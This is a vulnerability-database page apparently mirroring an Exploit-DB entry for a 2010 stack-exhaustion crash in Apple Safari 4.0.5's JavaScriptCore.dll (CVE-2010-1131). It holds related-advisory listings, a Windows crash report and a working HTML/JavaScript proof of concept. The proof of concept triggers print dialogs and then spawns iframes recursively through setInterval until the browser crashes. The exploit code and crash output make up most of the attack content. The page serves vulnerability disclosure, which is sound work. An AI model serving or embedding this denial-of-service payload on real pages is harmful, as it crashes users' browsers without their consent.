Lucene search
+L

Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion

🗓️ 03 May 2010 00:00:00Reported by Mathias KarlssonType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Apple Safari 4.0.5 JavaScriptCore.dll Stack Exhaustion vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-1131
22 Mar 201000:00
circl
cve
CVE
CVE-2010-1131
26 Mar 201021:00
cve
cvelist
Cvelist
CVE-2010-1131
26 Mar 201021:00
cvelist
exploitdb
Exploit DB
Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)
22 Mar 201000:00
exploitdb
euvd
EUVD
EUVD-2010-1162
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-1131
27 Mar 201019:07
nvd
openvas
OpenVAS
Apple Safari Nested 'object' Tag Remote Denial Of Service vulnerability
1 Apr 201000:00
openvas
openvas
OpenVAS
Apple Safari Nested 'object' Tag Remote Denial Of Service vulnerability
1 Apr 201000:00
openvas
prion
Prion
Hardcoded credentials
27 Mar 201019:07
prion
redhatcve
RedhatCVE
CVE-2010-1131
22 May 202501:15
redhatcve
Rows per page
<html>

<---------------------
Crash Report

  Problem Event Name:   APPCRASH
  Application Name:     Safari.exe
  Application Version:  5.31.22.7
  Application Timestamp:        4b8f94fa
  Fault Module Name:    JavaScriptCore.dll
  Fault Module Version: 5.31.22.5
  Fault Module Timestamp:       4b8cb88c
  Exception Code:       c00000fd
  Exception Offset:     000889f7
  OS Version:   6.1.7600.2.0.0.256.48
  Locale ID:    1053
  Additional Information 1:     d4bb
  Additional Information 2:     d4bb5342a8501f1ef1ad79845414ed25
  Additional Information 3:     57f4
  Additional Information 4:     57f4717a3dd18c61a213b49009cb5bb7

Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/

Note:
If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup.

---------------------->

<script>
window.print();
a();
function a()
{
        setInterval(b,0);
}
function b()
{
        var c = document.createElement("iframe");
        c.setAttribute("src",document.location);
        document.getElementsByTagName("body")[0].appendChild(c);
        setInterval(a,0);
}
</script>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 May 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.03838
28